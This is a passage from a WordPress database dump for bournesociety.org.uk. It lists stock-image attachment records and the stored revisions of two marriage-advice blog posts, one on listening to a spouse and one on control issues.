09:28:02','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wheelchair-carer.jpg',0,'attachment','image/jpeg',0),(179,1,'2017-10-04 09:28:04','2017-10-04 09:28:04','','white books','','inherit','open','closed','','white-books','','','2017-10-04 09:28:04','2017-10-04 09:28:04','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/white-books.jpg',0,'attachment','image/jpeg',0),(180,1,'2017-10-04 09:28:05','2017-10-04 09:28:05','','white keyboard','','inherit','open','closed','','white-keyboard','','','2017-10-04 09:28:05','2017-10-04 09:28:05','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/white-keyboard.jpg',0,'attachment','image/jpeg',0),(181,1,'2017-10-04 09:28:07','2017-10-04 09:28:07','','white lamb','','inherit','open','closed','','white-lamb','','','2017-10-04 09:28:07','2017-10-04 09:28:07','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/white-lamb.jpg',0,'attachment','image/jpeg',0),(182,1,'2017-10-04 09:28:09','2017-10-04 09:28:09','','white teeth','','inherit','open','closed','','white-teeth','','','2017-10-04 09:28:09','2017-10-04 09:28:09','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/white-teeth.jpg',0,'attachment','image/jpeg',0),(184,1,'2017-10-04 09:28:10','2017-10-04 09:28:10','','wifi logo','','inherit','open','closed','','wifi-logo','','','2017-10-04 09:28:10','2017-10-04 09:28:10','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wifi-logo.png',0,'attachment','image/png',0),(185,1,'2017-10-04 09:28:12','2017-10-04 09:28:12','','Will-Polaroid','','inherit','open','closed','','will-polaroid','','','2017-10-04 09:28:12','2017-10-04 09:28:12','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/Will-Polaroid.png',0,'attachment','image/png',0),(186,1,'2017-10-04 09:28:14','2017-10-04 09:28:14','','Wiltshire grass','','inherit','open','closed','','wiltshire-grass','','','2017-10-04 09:28:14','2017-10-04 09:28:14','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/Wiltshire-grass.jpg',0,'attachment','image/jpeg',0),(187,1,'2017-10-04 09:28:15','2017-10-04 09:28:15','','wiltshire map','','inherit','open','closed','','wiltshire-map','','','2017-10-04 09:28:15','2017-10-04 09:28:15','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wiltshire-map.png',0,'attachment','image/png',0),(188,1,'2017-10-04 09:28:17','2017-10-04 09:28:17','','wind and mountains','','inherit','open','closed','','wind-and-mountains','','','2017-10-04 09:28:17','2017-10-04 09:28:17','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wind-and-mountains.jpg',0,'attachment','image/jpeg',0),(190,1,'2017-10-04 09:28:21','2017-10-04 09:28:21','','wind farm','','inherit','open','closed','','wind-farm','','','2017-10-04 09:28:21','2017-10-04 09:28:21','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wind-farm.jpg',0,'attachment','image/jpeg',0),(191,1,'2017-10-04 09:28:23','2017-10-04 09:28:23','','wind power sky','','inherit','open','closed','','wind-power-sky','','','2017-10-04 09:28:23','2017-10-04 09:28:23','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wind-power-sky.jpg',0,'attachment','image/jpeg',0),(192,1,'2017-10-04 09:28:24','2017-10-04 09:28:24','','wind power','','inherit','open','closed','','wind-power','','','2017-10-04 09:28:24','2017-10-04 09:28:24','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wind-power.jpg',0,'attachment','image/jpeg',0),(193,1,'2017-10-04 09:28:26','2017-10-04 09:28:26','','wind turbine sun','','inherit','open','closed','','wind-turbine-sun','','','2017-10-04 09:28:26','2017-10-04 09:28:26','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wind-turbine-sun.jpg',0,'attachment','image/jpeg',0),(194,1,'2017-10-04 09:28:28','2017-10-04 09:28:28','','wind turbine','','inherit','open','closed','','wind-turbine','','','2017-10-04 09:28:28','2017-10-04 09:28:28','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wind-turbine.jpg',0,'attachment','image/jpeg',0),(195,1,'2017-10-04 09:28:29','2017-10-04 09:28:29','','wind-energy-2244141_960_720','','inherit','open','closed','','wind-energy-2244141_960_720','','','2017-10-04 09:28:29','2017-10-04 09:28:29','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wind-energy-2244141_960_720.jpg',0,'attachment','image/jpeg',0),(196,1,'2017-10-04 09:28:31','2017-10-04 09:28:31','','Windmill','','inherit','open','closed','','windmill','','','2017-10-04 09:28:31','2017-10-04 09:28:31','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/Windmill.jpg',0,'attachment','image/jpeg',0),(197,1,'2017-10-04 09:28:33','2017-10-04 09:28:33','','windmills','','inherit','open','closed','','windmills','','','2017-10-04 09:28:33','2017-10-04 09:28:33','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/windmills.jpg',0,'attachment','image/jpeg',0),(198,1,'2017-10-04 09:28:34','2017-10-04 09:28:34','','window cleaning','','inherit','open','closed','','window-cleaning','','','2017-10-04 09:28:34','2017-10-04 09:28:34','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/window-cleaning.jpg',0,'attachment','image/jpeg',0),(199,1,'2017-10-04 09:28:36','2017-10-04 09:28:36','','window old hatch','','inherit','open','closed','','window-old-hatch','','','2017-10-04 09:28:36','2017-10-04 09:28:36','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/window-old-hatch.jpg',0,'attachment','image/jpeg',0),(200,1,'2017-10-04 09:28:38','2017-10-04 09:28:38','','window pots','','inherit','open','closed','','window-pots','','','2017-10-04 09:28:38','2017-10-04 09:28:38','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/window-pots.jpg',0,'attachment','image/jpeg',0),(201,1,'2017-10-04 09:28:40','2017-10-04 09:28:40','','window top','','inherit','open','closed','','window-top','','','2017-10-04 09:28:40','2017-10-04 09:28:40','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/window-top.jpg',0,'attachment','image/jpeg',0),(202,1,'2017-10-04 09:28:41','2017-10-04 09:28:41','','window','','inherit','open','closed','','window','','','2017-10-04 09:28:41','2017-10-04 09:28:41','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/window.jpg',0,'attachment','image/jpeg',0),(203,1,'2017-10-04 09:28:43','2017-10-04 09:28:43','','window-cleaning','','inherit','open','closed','','window-cleaning-2','','','2017-10-04 09:28:43','2017-10-04 09:28:43','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/window-cleaning-1.jpg',0,'attachment','image/jpeg',0),(204,1,'2017-10-04 09:28:44','2017-10-04 09:28:44','','wine glass','','inherit','open','closed','','wine-glass','','','2017-10-04 09:28:44','2017-10-04 09:28:44','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wine-glass.jpg',0,'attachment','image/jpeg',0),(205,1,'2017-10-04 09:28:46','2017-10-04 09:28:46','','wine glasses','','inherit','open','closed','','wine-glasses','','','2017-10-04 09:28:46','2017-10-04 09:28:46','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wine-glasses.jpg',0,'attachment','image/jpeg',0),(206,1,'2017-10-04 09:28:48','2017-10-04 09:28:48','','wine labes','','inherit','open','closed','','wine-labes','','','2017-10-04 09:28:48','2017-10-04 09:28:48','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wine-labes.jpg',0,'attachment','image/jpeg',0),(207,1,'2017-10-04 09:28:49','2017-10-04 09:28:49','','wine','','inherit','open','closed','','wine','','','2017-10-04 09:28:49','2017-10-04 09:28:49','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wine.jpg',0,'attachment','image/jpeg',0),(208,1,'2017-10-04 09:28:50','2017-10-04 09:28:50','','wing fan','','inherit','open','closed','','wing-fan','','','2017-10-04 09:28:50','2017-10-04 09:28:50','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wing-fan.jpg',0,'attachment','image/jpeg',0),(209,1,'2017-10-04 09:28:52','2017-10-04 09:28:52','','winter holiday','','inherit','open','closed','','winter-holiday','','','2017-10-04 09:28:52','2017-10-04 09:28:52','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/winter-holiday.jpg',0,'attachment','image/jpeg',0),(210,1,'2017-10-04 09:28:54','2017-10-04 09:28:54','','winter socks','','inherit','open','closed','','winter-socks','','','2017-10-04 09:28:54','2017-10-04 09:28:54','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/winter-socks.jpg',0,'attachment','image/jpeg',0),(211,1,'2017-10-04 09:28:55','2017-10-04 09:28:55','','wire','','inherit','open','closed','','wire','','','2017-10-04 09:28:55','2017-10-04 09:28:55','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wire.jpg',0,'attachment','image/jpeg',0),(212,1,'2017-10-04 09:28:57','2017-10-04 09:28:57','','wires on back','','inherit','open','closed','','wires-on-back','','','2017-10-04 09:28:57','2017-10-04 09:28:57','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wires-on-back.jpg',0,'attachment','image/jpeg',0),(213,1,'2017-10-04 09:28:58','2017-10-04 09:28:58','','wiring cv','','inherit','open','closed','','wiring-cv','','','2017-10-04 09:28:58','2017-10-04 09:28:58','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wiring-cv.jpg',0,'attachment','image/jpeg',0),(214,1,'2017-10-04 09:29:00','2017-10-04 09:29:00','','wise up to waste','','inherit','open','closed','','wise-up-to-waste','','','2017-10-04 09:29:00','2017-10-04 09:29:00','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wise-up-to-waste.png',0,'attachment','image/png',0),(215,1,'2017-10-04 09:29:01','2017-10-04 09:29:01','','woman','','inherit','open','closed','','woman','','','2017-10-04 09:29:01','2017-10-04 09:29:01','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/woman.jpg',0,'attachment','image/jpeg',0),(216,1,'2017-10-04 09:29:03','2017-10-04 09:29:03','','women teamwork','','inherit','open','closed','','women-teamwork','','','2017-10-04 09:29:03','2017-10-04 09:29:03','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/women-teamwork.jpg',0,'attachment','image/jpeg',0),(217,1,'2017-10-04 09:29:05','2017-10-04 09:29:05','','wood materials','','inherit','open','closed','','wood-materials','','','2017-10-04 09:29:05','2017-10-04 09:29:05','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wood-materials.jpg',0,'attachment','image/jpeg',0),(218,1,'2017-10-04 09:29:07','2017-10-04 09:29:07','','wood','','inherit','open','closed','','wood','','','2017-10-04 09:29:07','2017-10-04 09:29:07','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wood.jpg',0,'attachment','image/jpeg',0),(219,1,'2017-10-04 09:29:09','2017-10-04 09:29:09','','wooden home','','inherit','open','closed','','wooden-home','','','2017-10-04 09:29:09','2017-10-04 09:29:09','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wooden-home.jpg',0,'attachment','image/jpeg',0),(220,1,'2017-10-04 09:29:11','2017-10-04 09:29:11','','woodland road','','inherit','open','closed','','woodland-road','','','2017-10-04 09:29:11','2017-10-04 09:29:11','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/woodland-road.jpg',0,'attachment','image/jpeg',0),(221,1,'2017-10-04 09:29:12','2017-10-04 09:29:12','','wool-480550_960_720','','inherit','open','closed','','wool-480550_960_720','','','2017-10-04 09:29:12','2017-10-04 09:29:12','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wool-480550_960_720.jpg',0,'attachment','image/jpeg',0),(222,1,'2017-10-04 09:29:14','2017-10-04 09:29:14','','Woolworths_Hounslow_-_Closing_Down_Sale_-_Exterior','','inherit','open','closed','','woolworths_hounslow_-_closing_down_sale_-_exterior','','','2017-10-04 09:29:14','2017-10-04 09:29:14','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/Woolworths_Hounslow_-_Closing_Down_Sale_-_Exterior.jpg',0,'attachment','image/jpeg',0),(223,1,'2017-10-04 09:29:16','2017-10-04 09:29:16','','work at desk','','inherit','open','closed','','work-at-desk','','','2017-10-04 09:29:16','2017-10-04 09:29:16','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/work-at-desk.jpg',0,'attachment','image/jpeg',0),(224,1,'2017-10-04 09:29:18','2017-10-04 09:29:18','','work','','inherit','open','closed','','work','','','2017-10-04 09:29:18','2017-10-04 09:29:18','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/work.jpg',0,'attachment','image/jpeg',0),(225,1,'2017-10-04 09:29:20','2017-10-04 09:29:20','','working in cafe','','inherit','open','closed','','working-in-cafe','','','2017-10-04 09:29:20','2017-10-04 09:29:20','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/working-in-cafe.jpg',0,'attachment','image/jpeg',0),(226,1,'2017-10-04 09:29:28','2017-10-04 09:29:28','','001062210 Okahoma continues to recover','Oklahoma City,OK, June 22,2010--A roofer repairs a roof that was damaged by tornadoes that ripped through Oklahoma in early May 2010.  FEMA is working with local, state, private and federal agencies and businesses to help individuals  and business with their recovery.  Photo by Patsy Lynch/FEMA','inherit','open','closed','','001062210-okahoma-continues-to-recover','','','2017-10-04 09:29:28','2017-10-04 09:29:28','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/working-on-a-home.jpg',0,'attachment','image/jpeg',0),(227,1,'2017-10-04 09:29:33','2017-10-04 09:29:33','','Startup Stock Photos','Startup Stock Photos','inherit','open','closed','','startup-stock-photos','','','2017-10-04 09:29:33','2017-10-04 09:29:33','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/working.jpg',0,'attachment','image/jpeg',0),(228,1,'2017-10-04 09:29:37','2017-10-04 09:29:37','','workmen','','inherit','open','closed','','workmen','','','2017-10-04 09:29:37','2017-10-04 09:29:37','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/workmen.jpg',0,'attachment','image/jpeg',0),(229,1,'2017-10-04 09:29:38','2017-10-04 09:29:38','','world clocks','','inherit','open','closed','','world-clocks','','','2017-10-04 09:29:38','2017-10-04 09:29:38','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/world-clocks.jpg',0,'attachment','image/jpeg',0),(230,1,'2017-10-04 09:29:40','2017-10-04 09:29:40','','world connections','','inherit','open','closed','','world-connections','','','2017-10-04 09:29:40','2017-10-04 09:29:40','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/world-connections.jpg',0,'attachment','image/jpeg',0),(231,1,'2017-10-04 09:29:42','2017-10-04 09:29:42','','world in hands','','inherit','open','closed','','world-in-hands','','','2017-10-04 09:29:42','2017-10-04 09:29:42','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/world-in-hands.jpg',0,'attachment','image/jpeg',0),(232,1,'2017-10-04 09:29:43','2017-10-04 09:29:43','','worldwide networking','','inherit','open','closed','','worldwide-networking','','','2017-10-04 09:29:43','2017-10-04 09:29:43','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/worldwide-networking.jpg',0,'attachment','image/jpeg',0),(233,1,'2017-10-04 09:29:45','2017-10-04 09:29:45','','worthing coast','','inherit','open','closed','','worthing-coast','','','2017-10-04 09:29:45','2017-10-04 09:29:45','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/worthing-coast.jpg',0,'attachment','image/jpeg',0),(234,1,'2017-10-04 09:29:47','2017-10-04 09:29:47','','wrapped gifts','','inherit','open','closed','','wrapped-gifts','','','2017-10-04 09:29:47','2017-10-04 09:29:47','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wrapped-gifts.jpg',0,'attachment','image/jpeg',0),(235,1,'2017-10-04 09:29:48','2017-10-04 09:29:48','','Wrappz 4 cases pic','','inherit','open','closed','','wrappz-4-cases-pic','','','2017-10-04 09:29:48','2017-10-04 09:29:48','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/Wrappz-4-cases-pic.png',0,'attachment','image/png',0),(236,1,'2017-10-04 09:29:50','2017-10-04 09:29:50','','wrappz coaster','','inherit','open','closed','','wrappz-coaster','','','2017-10-04 09:29:50','2017-10-04 09:29:50','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wrappz-coaster.jpg',0,'attachment','image/jpeg',0),(237,1,'2017-10-04 09:29:51','2017-10-04 09:29:51','','wrappz delivery','','inherit','open','closed','','wrappz-delivery','','','2017-10-04 09:29:51','2017-10-04 09:29:51','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wrappz-delivery.png',0,'attachment','image/png',0),(238,1,'2017-10-04 09:29:53','2017-10-04 09:29:53','','wrappz keyring','','inherit','open','closed','','wrappz-keyring','','','2017-10-04 09:29:53','2017-10-04 09:29:53','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wrappz-keyring.jpg',0,'attachment','image/jpeg',0),(239,1,'2017-10-04 09:29:54','2017-10-04 09:29:54','','wrappz laptop','','inherit','open','closed','','wrappz-laptop','','','2017-10-04 09:29:54','2017-10-04 09:29:54','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wrappz-laptop.jpg',0,'attachment','image/jpeg',0),(240,1,'2017-10-04 09:29:56','2017-10-04 09:29:56','','wrappz logo','','inherit','open','closed','','wrappz-logo','','','2017-10-04 09:29:56','2017-10-04 09:29:56','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wrappz-logo.png',0,'attachment','image/png',0),(241,1,'2017-10-04 09:29:58','2017-10-04 09:29:58','','Wrappz love cushion','','inherit','open','closed','','wrappz-love-cushion','','','2017-10-04 09:29:58','2017-10-04 09:29:58','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/Wrappz-love-cushion.png',0,'attachment','image/png',0),(242,1,'2017-10-04 09:29:59','2017-10-04 09:29:59','','wrappz mug','','inherit','open','closed','','wrappz-mug','','','2017-10-04 09:29:59','2017-10-04 09:29:59','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wrappz-mug.jpg',0,'attachment','image/jpeg',0),(243,1,'2017-10-04 09:30:01','2017-10-04 09:30:01','','Wrappz wedding','','inherit','open','closed','','wrappz-wedding','','','2017-10-04 09:30:01','2017-10-04 09:30:01','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/Wrappz-wedding.png',0,'attachment','image/png',0),(244,1,'2017-10-04 09:30:03','2017-10-04 09:30:03','','wrappz-logo','','inherit','open','closed','','wrappz-logo-2','','','2017-10-04 09:30:03','2017-10-04 09:30:03','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wrappz-logo-1.png',0,'attachment','image/png',0),(245,1,'2017-10-04 09:30:04','2017-10-04 09:30:04','','wraps','','inherit','open','closed','','wraps','','','2017-10-04 09:30:04','2017-10-04 09:30:04','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/wraps.jpg',0,'attachment','image/jpeg',0),(246,1,'2017-10-04 09:30:06','2017-10-04 09:30:06','','writing and laptop','','inherit','open','closed','','writing-and-laptop','','','2017-10-04 09:30:06','2017-10-04 09:30:06','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/writing-and-laptop.jpg',0,'attachment','image/jpeg',0),(247,1,'2017-10-04 09:30:08','2017-10-04 09:30:08','','writing contract','','inherit','open','closed','','writing-contract','','','2017-10-04 09:30:08','2017-10-04 09:30:08','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/writing-contract.jpg',0,'attachment','image/jpeg',0),(248,1,'2017-10-04 09:30:09','2017-10-04 09:30:09','','writing note','','inherit','open','closed','','writing-note','','','2017-10-04 09:30:09','2017-10-04 09:30:09','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/writing-note.jpg',0,'attachment','image/jpeg',0),(249,1,'2017-10-04 09:30:11','2017-10-04 09:30:11','','writing on paper','','inherit','open','closed','','writing-on-paper','','','2017-10-04 09:30:11','2017-10-04 09:30:11','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/writing-on-paper.jpg',0,'attachment','image/jpeg',0),(250,1,'2017-10-04 09:30:12','2017-10-04 09:30:12','','writing paper','','inherit','open','closed','','writing-paper','','','2017-10-04 09:30:12','2017-10-04 09:30:12','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/writing-paper.jpg',0,'attachment','image/jpeg',0),(251,1,'2017-10-04 09:30:14','2017-10-04 09:30:14','','writing','','inherit','open','closed','','writing','','','2017-10-04 09:30:14','2017-10-04 09:30:14','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/writing.jpg',0,'attachment','image/jpeg',0),(252,1,'2017-10-04 09:30:15','2017-10-04 09:30:15','','written blog','','inherit','open','closed','','written-blog','','','2017-10-04 09:30:15','2017-10-04 09:30:15','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/written-blog.jpg',0,'attachment','image/jpeg',0),(253,1,'2017-10-04 09:30:17','2017-10-04 09:30:17','','written document','','inherit','open','closed','','written-document','','','2017-10-04 09:30:17','2017-10-04 09:30:17','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/written-document.jpg',0,'attachment','image/jpeg',0),(254,1,'2017-10-04 09:30:19','2017-10-04 09:30:19','','written paper','','inherit','open','closed','','written-paper','','','2017-10-04 09:30:19','2017-10-04 09:30:19','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/written-paper.jpg',0,'attachment','image/jpeg',0),(255,1,'2017-10-04 09:30:20','2017-10-04 09:30:20','','xbox repair','','inherit','open','closed','','xbox-repair','','','2017-10-04 09:30:20','2017-10-04 09:30:20','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/xbox-repair.png',0,'attachment','image/png',0),(256,1,'2017-10-04 09:30:22','2017-10-04 09:30:22','','xray dentist','','inherit','open','closed','','xray-dentist','','','2017-10-04 09:30:22','2017-10-04 09:30:22','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/xray-dentist.jpg',0,'attachment','image/jpeg',0),(257,1,'2017-10-04 09:30:24','2017-10-04 09:30:24','','yamaha','','inherit','open','closed','','yamaha','','','2017-10-04 09:30:24','2017-10-04 09:30:24','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/yamaha.jpg',0,'attachment','image/jpeg',0),(258,1,'2017-10-04 09:30:25','2017-10-04 09:30:25','','yammer','','inherit','open','closed','','yammer','','','2017-10-04 09:30:25','2017-10-04 09:30:25','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/yammer.png',0,'attachment','image/png',0),(259,1,'2017-10-04 09:30:29','2017-10-04 09:30:29','','MINOLTA DIGITAL CAMERA','MINOLTA DIGITAL CAMERA','inherit','open','closed','','minolta-digital-camera','','','2017-10-04 09:30:29','2017-10-04 09:30:29','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/yellow-festival.jpg',0,'attachment','image/jpeg',0),(260,1,'2017-10-04 09:30:31','2017-10-04 09:30:31','','yellow insulation','','inherit','open','closed','','yellow-insulation','','','2017-10-04 09:30:31','2017-10-04 09:30:31','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/yellow-insulation.jpg',0,'attachment','image/jpeg',0),(261,1,'2017-10-04 09:30:32','2017-10-04 09:30:32','','yellow','','inherit','open','closed','','yellow','','','2017-10-04 09:30:32','2017-10-04 09:30:32','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/yellow.jpg',0,'attachment','image/jpeg',0),(262,1,'2017-10-04 09:30:34','2017-10-04 09:30:34','','yoga in grass','','inherit','open','closed','','yoga-in-grass','','','2017-10-04 09:30:34','2017-10-04 09:30:34','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/yoga-in-grass.jpg',0,'attachment','image/jpeg',0),(263,1,'2017-10-04 09:30:36','2017-10-04 09:30:36','','yoga session','','inherit','open','closed','','yoga-session','','','2017-10-04 09:30:36','2017-10-04 09:30:36','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/yoga-session.jpg',0,'attachment','image/jpeg',0),(264,1,'2017-10-04 09:30:37','2017-10-04 09:30:37','','yuki campervan','','inherit','open','closed','','yuki-campervan','','','2017-10-04 09:30:37','2017-10-04 09:30:37','',0,'http://www.bournesociety.org.uk/wp-content/uploads/2017/10/yuki-campervan.jpg',0,'attachment','image/jpeg',0),(265,1,'2017-10-04 09:40:33','2017-10-04 09:40:33','<div id=\"content\" class=\"hfeed\">\r\n<div id=\"fb-root\"></div>\r\n<div id=\"post-7\" class=\"post-7 post type-post status-publish format-standard hentry category-marriage post_box top\">\r\n<div class=\"headline_area\">\r\n<h1 class=\"entry-title\">Did You Hear What I Just Said… The very best 10 steps on How to Really Listen To Your Spouse</h1>\r\n<p class=\"headline_meta\"></p>\r\n\r\n</div>\r\n<div class=\"format_text entry-content\">\r\n<div class=\"wpfblike\" style=\"height: 40px;\"></div>\r\n<div class=\"twitter_button\" style=\"float: right; margin-left: 10px;\"></div>\r\n<div class=\"tweetmeme_button\" style=\"float: right; margin-left: 10px;\"></div>\r\nSpouses who don’t talk to each other much is a sign of a marriage in trouble because no marriage stands a chance without efficient communication. In order to communicate effectively in a marriage or relationship you need to say to yourself; what is it that I am trying to say? Are you simply trying to be understood, to get what you want or do you have some other purpose behind the words that you are saying?<span id=\"more-7\"></span>\r\n\r\nA great deal of communication is physical by way of actions and body language and only a small part of our communication takes place in words, which we say and listen to all day. Although we may believe that someone is really listening to and understanding what we are saying, the fact is this is very often not the case.\r\n\r\nWhen it is us doing the talking, the person we are talking to is usually thinking what they are going to say back or creating some kind of mental image, which might be completely different to what you actually said to them. We all have our own mental frames of reference, which can alter the message which we are listening to. We are desperately trying to make ourselves understood by the other person, with words going back and forth like arrows but most of them are just missing the target.\r\n<h3>Do Not Play the Blame Game</h3>\r\nIn an argument, many married couples only want to prove that they are in the right and their partner is wrong. Bringing up the others personal shortcomings and using spiteful words and blame as a weapon against them will make the other person feel inadequate. They won’t hear the real message behind the words, just the anger and self-righteousness. To stop this, agree to stop blaming one another and give each other a proper chance to speak and be heard. You have to come to a mutual understanding, not prove you are completely right and the other is completely wrong\r\n<h3>Learn To Listen Effectively</h3>\r\nMarital communication is not simply about spouses talking to each other but also listening to and hearing what is being said.\r\n\r\nTo really hear what someone is saying you have to try to forget your own point of view and allow yourself to feel what the other person is trying to say. If someone wants you to listen to what they have to say don’t talk, just do what they are asking you to do…listen. They may not want your feedback just someone to hear and understand what they are feeling.\r\n\r\nSome people appear to be listening but are only really engaged in their own thoughts. To overcome this, repeat to them what you think they just said so that they know that what they are saying is getting through to you. If you want to talk, wait a minute for your turn, and they will listen to you.\r\n<h3>Real Listening</h3>\r\nListening, real listening is what many married couples fail to do. Real listening is done not just with the ears but with all of our consciousness. It is being tolerant of something you may not want to hear. It is opening your mind up to other points of view and realities. Real listening lets your partner know that you respect their thoughts and that you really care for them.\r\n\r\n</div>\r\n</div>\r\n</div>','Did You Hear What I Just Said… How to Really Listen To Your Spouse - Save Your Marriage','','inherit','closed','closed','','57-revision-v1','','','2017-10-04 09:40:33','2017-10-04 09:40:33','',57,'http://www.bournesociety.org.uk/57-revision-v1',0,'revision','',0),(266,1,'2017-10-04 09:40:57','2017-10-04 09:40:57','<div id=\"content\" class=\"hfeed\">\r\n<div id=\"post-153\" class=\"post-153 post type-post status-publish format-standard hentry category-marriage tag-control-freak tag-keep-your-marriage tag-marriage-problems tag-nancy-wasson tag-relationship tag-resentment post_box top\">\r\n<div class=\"headline_area\">\r\n<h1 class=\"entry-title\">Control Issues That Cause Marriage Problems</h1>\r\n<p class=\"headline_meta\"></p>\r\n\r\n</div>\r\n<div class=\"format_text entry-content\">\r\n\r\nHave you ever been irritated because your spouse does things differently than you do? Do you get upset if he or she has different opinions and makes different choices than you would? If so, you have bumped up against some of your own personal <em>control issues</em> and triggers in your marriage. Here are three important points to consider:<span id=\"more-153\"></span>\r\n<h3><strong>1. Fear underlies control issues.</strong></h3>\r\n<span style=\"text-decoration: underline;\">Control issues</span> cause problems in many marriages. The feelings you experience at those times can be very intense and may include rage at the other person. Most people feel more secure when others around them mirror their opinions, beliefs, and choices. Your safety needs and fears contribute to your wanting others to be just like you. The old adage, “There is safety in numbers,” refers to this primitive fear of standing alone.\r\n\r\nAlso, many people feel more in control when they can predict the behavior of others and when others meet their expectations. Then they don’t have to experience the discomfort of growing, changing, or stretching themselves. Instead, they can pretend that their world is logical, orderly, predictable, and safe.\r\n<h3><strong>2. Thinking your spouse should be just like you harms your marriage.</strong></h3>\r\nYour control issues are also triggered by viewing your spouse as an extension of yourself. This perception can result in trying to dictate which clothes your spouse wears, how she wears her hair, who she is friends with, what political views she holds, and what she can or cannot do. While your spouse may initially make some changes trying to keep the peace, you are creating a parent-child dynamic in your relationship that will eventually foster rebellion and resentment.\r\n<h3><strong>3. Using insults and name calling are attempts to regain control.</strong></h3>\r\nWhile nothing sinister is involved in many control issues in relationships, pathological behavior can be triggered in some instances. For example, a partner who is angry that the spouse did not follow his dictates could become physically and emotionally abusive. The partner may think he has the right to “punish” the other person. Name calling and derogatory put-downs, such as “What a stupid thing to do,” are often used to re-establish control over the other person.\r\n\r\nIt’s easy to point a finger at your spouse and to state that he or she needs to change. It’s hard to face your own unresolved issues head-on and take responsibility for how you need to change. As you become more aware of <strong>control issues</strong> in your marriage, the starting place for change is always with yourself and your response to what is happening.\r\n<h3></h3>\r\n</div>\r\n</div>\r\n</div>','Control Issues That Cause Marriage Problems','Control issues cause problems in many marriages. Do you get upset if he or she has different opinions and makes different choices 